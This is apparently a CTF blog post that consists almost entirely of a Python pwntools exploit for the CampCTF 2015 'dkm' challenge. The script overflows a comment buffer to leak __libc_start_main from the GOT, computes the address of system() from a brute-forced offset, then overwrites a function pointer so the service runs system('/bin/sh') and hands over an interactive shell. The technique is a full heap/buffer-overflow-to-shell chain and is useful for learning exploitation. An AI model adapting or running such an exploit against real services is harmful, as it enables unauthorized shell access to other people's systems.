CAMPCTF 2015 dkm

Games/CTF 2015. 11. 19. 02:39

#!/usr/bin/env python

from pwn import *

context.arch = 'amd64'  # pack()/u64() below work on 64-bit little-endian words

# The local copy of the binary is only used to look up one GOT slot.
# NOTE: the name `puts` is a misnomer -- this is the GOT entry of
# __libc_start_main, which is the value stage 1 reads back.
elf = ELF('dkm.elf')
puts = elf.got['__libc_start_main']

# Connect to the challenge service and discard the first menu prompt.
# (A local instance on port 5555 was used while developing the script.)
#r = remote("localhost", 5555)
r = remote("challs.campctf.ccc.ac", 10102)
r.recvuntil('> ')


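def send_menu(r, s):
    """Answer one menu prompt and echo the service's next prompt.

    Args:
        r: pwntools tube connected to the challenge service.
        s: reply to send; a trailing newline is appended.

    Everything received up to and including the next '> ' prompt is
    printed so the transcript stays visible while the script runs.
    """
    r.send(s + '\n')
    # Parenthesised single-argument print behaves the same on Python 2 and 3,
    # whereas the bare print statement is a SyntaxError on Python 3.
    print(r.recvuntil('> '))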


# Walk the menu four times, answering each prompt in order. The sequences
# are exactly those of the original script; the fifth answer of the first
# pass is the number of SSIDs (per the original note), the free-text
# answers are filler.
for _answers in (
    ['2', '1', '0', '0', '0', 'no comment'],  # 5th answer: number of ssid
    ['4', '0', '2', '0', '0', 'no comment'],
    ['2', '1', '0', '0', '0', 'no comment'],
    ['4', '0', '3', '0', '0', '0'],
):
    for _answer in _answers:
        send_menu(r, _answer)


# Distance from __libc_start_main to system() in the remote libc; it is
# ADDED to the leaked address in stage 1, so it is system - libc_start.
# The original author notes this value was brute-forced, not looked up.
SYSTEM_OFFSET = 0x23a80  # libc_start - system. brute force this offset!

# Address of the binary's "show with wifi" routine used in the stage-1 payload.
show_with_wifi = 0x4009F0

# Placeholder for the leaked address; stage 1 assigns the real value.
libc_start_addr = 0


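# stage1> leak got
# Build the "comment" payload: 0x310 bytes of filler followed by the packed
# fields the service reads back, the last pointer being the GOT slot to print.
comment = 'A' * 0x310
comment += pack(0)               # latitude
comment += pack(0)               # longitude
comment += pack(show_with_wifi)  # show with wifi
comment += pack(0xdeadbeef)      # edit
comment += pack(puts)            # GOT slot of __libc_start_main (`puts` is a misnomer)
comment += pack(0)
r.send(comment + '\n')
print(r.recvuntil('> '))

# Display the entry; the SSID field echoes the bytes behind the GOT slot.
r.send('1\n')
leak = r.recvuntil('> ')
print(leak)

# Fail loudly if the response does not look like a leak instead of dying
# with an IndexError/ValueError deep inside the parsing expression.
marker = 'SSID: '
if marker not in leak:
    raise ValueError('leak response did not contain %r' % marker)
raw = leak.split(marker)[1][:6]  # six bytes, as in the original script
if not raw:
    raise ValueError('leak response had no bytes after %r' % marker)
# u64() replaces the Python-2-only .encode('hex') round trip; zero-padding
# a short read to eight bytes yields the same little-endian value.
libc_start_addr = u64(raw.ljust(8, '\0'))
system_addr = libc_start_addr + SYSTEM_OFFSET
print('libc_start at -{0}-'.format(hex(libc_start_addr)))
print('system at -{0}-'.format(hex(system_addr)))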


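# stage2> jmp to system
# Navigate back to the edit prompt with the same answers as the last pass above.
for _answer in ['4', '0', '3', '0', '0', '0']:
    send_menu(r, _answer)

# Same layout as the stage-1 payload, but the latitude field now carries
# the string "/bin/sh" and the show pointer is replaced with system_addr.
comment = 'A' * 0x310
comment += '/bin/sh\0'        # latitude -> "/bin/sh"
comment += pack(0)            # longitude
comment += pack(system_addr)  # change show to system
comment += pack(0xdeadbeef)   # edit
comment += pack(0)
r.send(comment + '\n')
# Parenthesised print keeps this line valid on both Python 2 and 3.
print(r.recvuntil('> '))

# As in stage 1, option 1 displays the entry; then hand the tube to the user.
r.send('1\n')
r.interactive()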

Posted by daehee87
